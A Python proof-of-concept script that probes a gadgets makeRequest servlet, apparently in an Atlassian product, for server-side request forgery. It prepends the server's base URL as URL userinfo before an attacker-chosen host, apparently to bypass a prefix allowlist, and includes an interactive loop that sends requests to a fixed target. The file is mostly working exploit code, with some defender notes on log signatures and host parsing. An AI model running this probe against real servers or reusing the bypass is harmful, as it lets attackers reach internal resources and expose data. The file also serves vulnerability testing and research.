import requests

import sys

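# Example of the request this script sends. In the url parameter, the text
# before '@' is URL userinfo; the host after '@' is the one an HTTP client
# actually connects to:
# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/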

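def ssrf_poc(url, ssrf_url):
    """Probe the gadgets ``makeRequest`` servlet at *url* for SSRF.

    Sends a single GET to ``<url>/plugins/servlet/gadgets/makeRequest`` with
    the query parameter ``url=<url>@<ssrf_url>``. In that value everything
    before ``@`` is the userinfo part of the URL and the real host is
    *ssrf_url*, so the value still starts with the server's own base URL.
    NOTE(review): presumably this is meant to get past a prefix-based
    allowlist on the server side -- confirm against the affected product.

    The target is reported as vulnerable when the response status is 200 and
    the body contains ``set-cookie``. That is a heuristic: a fetched resource
    that sets no cookie prints "No Vuln Exit!", so a negative result is not
    proof that the servlet is safe.

    For defenders: the probe is visible in access logs as a request to
    ``/plugins/servlet/gadgets/makeRequest`` whose ``url`` value contains
    ``@`` in the authority. A server-side check should compare the parsed
    host of that parameter rather than its string prefix.

    Args:
        url: Base URL of the server under test; one trailing ``/`` is dropped.
        ssrf_url: Host (and optional path) the server is asked to fetch.

    Returns:
        None. The outcome is printed to stdout.
    """
    # endswith() is safe on an empty string, where url[-1] raised IndexError.
    if url.endswith('/'):
        url = url[:-1]

    vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Accept": "*/*",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "X-Atlassian-Token": "no-check",
        "Connection": "close",
    }

    try:
        # Without a timeout an unresponsive host blocks the interactive loop
        # forever.
        r = requests.get(url=vuln_url, headers=headers, timeout=10)
    except requests.exceptions.RequestException as exc:
        # Connection errors, timeouts and malformed URLs are reported instead
        # of ending the session with a traceback.
        print("Request failed: %s" % exc)
        return

    # r.content is bytes; a bytes literal keeps the membership test valid on
    # Python 3 and behaves the same as the plain literal on Python 2.
    if r.status_code == 200 and b'set-cookie' in r.content:
        print("\n>>>>Send poc Success!\n")
        print('X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME'))
        print("\n>>>>vuln_url= " + vuln_url + '\n')
        # The body is untrusted remote content and is printed as received.
        print(r.content)
    else:
        print("No Vuln Exit!")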


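if __name__ == "__main__":
    # Interactive driver: repeatedly asks for a fetch target and runs the
    # probe against one fixed base URL.

    # raw_input only exists on Python 2; fall back to input on Python 3.
    try:
        read_line = raw_input
    except NameError:
        read_line = input

    # Base URL of the server under test (fixed; edit here to change it).
    url = "http://www.jas502n.com:8080"

    try:
        while True:
            print("")
            ssrf_url = read_line(">>>>SSRF URL: ")
            # A blank line would only produce a request with an empty fetch
            # target, so ask again.
            if not ssrf_url.strip():
                continue
            ssrf_poc(url, ssrf_url)
    except (EOFError, KeyboardInterrupt):
        # Ctrl-D / Ctrl-C ends the session cleanly; the original loop had no
        # exit path other than an unhandled exception.
        print("")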

